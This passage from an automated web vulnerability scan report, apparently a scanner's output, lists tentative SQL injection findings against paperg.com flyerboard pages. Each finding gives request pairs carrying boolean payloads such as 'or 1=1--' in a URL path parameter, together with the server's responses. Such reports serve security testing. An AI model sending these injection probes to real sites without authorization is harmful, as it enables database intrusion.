User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.18. http://www.paperg.com/flyerboard/nyprig/1753/45945.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1753/45945.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 94145908%20or%201%3d1--%20 and 94145908%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/nyprig/175394145908%20or%201%3d1--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3853
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NYPRIG - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "NYPRIG" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20716/1050811nyp130512849245945.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END
...[SNIP]...

Request 2

GET /flyerboard/nyprig/175394145908%20or%201%3d2--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.19. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/old-songs-festival/1552/45413.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77358718%20or%201%3d1--%20 and 77358718%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/old-songs-festival/155277358718%20or%201%3d1--%20/45413.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3961
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Old Songs Festival - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Old Songs Festival" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6583/0oldsongsf130470440345413.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/old-songs-festival/155277358718%20or%201%3d2--%20/45413.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.20. http://www.paperg.com/flyerboard/olsens/1552/42482.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/olsens/1552/42482.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20689799%20or%201%3d1--%20 and 20689799%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/olsens/155220689799%20or%201%3d1--%20/42482.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3856
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Olsen's - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Olsen's" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/19925/0olsens01130290108742482.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- EN
...[SNIP]...

Request 2

GET /flyerboard/olsens/155220689799%20or%201%3d2--%20/42482.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.21. http://www.paperg.com/flyerboard/pathways/1552/43051.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1552/43051.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18914863%20or%201%3d1--%20 and 18914863%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/pathways/155218914863%20or%201%3d1--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3864
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Pathways - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Pathways" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0042211pat130391499343051.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!--
...[SNIP]...

Request 2

GET /flyerboard/pathways/155218914863%20or%201%3d2--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.22. http://www.paperg.com/flyerboard/pathways/1753/43051.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1753/43051.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14406727%20or%201%3d1--%20 and 14406727%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/pathways/175314406727%20or%201%3d1--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3864
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Pathways - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Pathways" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0042211pat130391499343051.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!--
...[SNIP]...

Request 2

GET /flyerboard/pathways/175314406727%20or%201%3d2--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.23. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1552/45964.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11463703%20or%201%3d1--%20 and 11463703%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/residence-inn-by-marriott/155211463703%20or%201%3d1--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3946
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Residence Inn By Marriott" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7150/0residence130513260345964.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_log
...[SNIP]...

Request 2

GET /flyerboard/residence-inn-by-marriott/155211463703%20or%201%3d2--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.24. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1753/45964.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16800562%20or%201%3d1--%20 and 16800562%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/residence-inn-by-marriott/175316800562%20or%201%3d1--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3946
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Residence Inn By Marriott" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7150/0residence130513260345964.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_log
...[SNIP]...

Request 2

GET /flyerboard/residence-inn-by-marriott/175316800562%20or%201%3d2--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
